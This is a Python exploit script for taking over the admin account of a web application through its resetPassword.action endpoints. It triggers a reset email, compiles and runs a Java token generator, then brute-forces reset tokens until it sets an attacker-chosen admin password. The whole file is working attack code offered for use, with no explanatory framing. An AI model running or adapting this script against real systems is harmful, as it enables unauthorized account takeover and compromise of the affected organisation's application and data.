import requests import subprocess import sys import json proxies = {"http": "http://192.168.1.12:8080", "https": "http://192.168.1.12:8080"} import argparse parser = argparse.ArgumentParser(description="Enter the IP ,email and creds") parser.add_argument("--email", type=str, help="Target Email") parser.add_argument("--passwd", type=str, help="Target Password") parser.add_argument("--host", type=str, help="Target Host") parser.add_argument("--port", type=str, help="Target Password") parser.add_argument("--context", type=str, help="Target Context") args = parser.parse_args() def trigger_pasword_reset_token_email(email): print("[+] Password Reset for admin has been triggered") url = "http://"+str(args.host)+":"+str(args.port)+"/"+str(args.context)+"/resetPassword.action" headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:135.0) Gecko/20100101 Firefox/135.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate, br", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Connection": "keep-alive", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin"} data = {"email": str(email), "fromAjax": "true"} requests.post(url, headers=headers, data=data) def comiple_hasbruteforcer(): command = ["javac","-cp",".:./commons-codec-1.18.0.jar","TokenHashBruteForce.java"] with open("compile_output.txt.txt", "w") as outfile: try: result = subprocess.run(command, stdout=outfile, stderr=subprocess.PIPE, text=True) if result.returncode == 0: return "DONE" else: print(f"Execution failed with return code: {result.returncode}") print(f"Error output: {result.stderr}") sys.exit(0) except Exception as e: print(f"An error occurred: {e}") sys.exit(0) def genereate_token(): command = ["java","-cp",".:./commons-codec-1.18.0.jar","TokenHashBruteForce"] with open("final_exploit_list.txt", "w") as outfile: try: result = subprocess.run(command, stdout=outfile, stderr=subprocess.PIPE, text=True) if result.returncode == 0: print("[+] Tokens are ready for Brute Forcing") return "DONE" else: print(f"Execution failed with return code: {result.returncode}") print(f"Error output: {result.stderr}") sys.exit(0) except Exception as e: print(f"An error occurred: {e}") sys.exit(0) def bruteforce_token(): print("[+] Brute forcing Password Reset Token") token_list=[] with open("final_exploit_list.txt") as fd: token_list=fd.readlines() for token in token_list: token_to_test=token.strip() resp=password_reset(token_to_test,args.passwd) if "application/json" in resp.headers.get("Content-Type", ""): resp_json=json.loads(resp.content) if str(resp_json.get("success")).lower()=="true": print("[+] Reset Token was: "+str(token_to_test)) print("[+] username: admin") print("[+] password: "+str(args.passwd)) sys.exit(0) def password_reset(token,password): url = "http://"+str(args.host)+":"+str(args.port)+"/"+str(args.context)+"/resetPassword!reset.action" headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:135.0) Gecko/20100101 Firefox/135.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate, br", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Connection": "keep-alive", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin"} data = {"ctk": str(token), "automaticLoginAfterReset": "true", "passwd": str(password), "passwd2": str(password), "fromAjax": "true", "_dc": "1745851928642", "appType": '', "appActionName": str(token)} resp=requests.post(url, headers=headers, data=data) return resp compilation_output=comiple_hasbruteforcer() if compilation_output=="DONE": trigger_pasword_reset_token_email(args.email) token_genearated_data=genereate_token() if token_genearated_data=="DONE": bruteforce_token()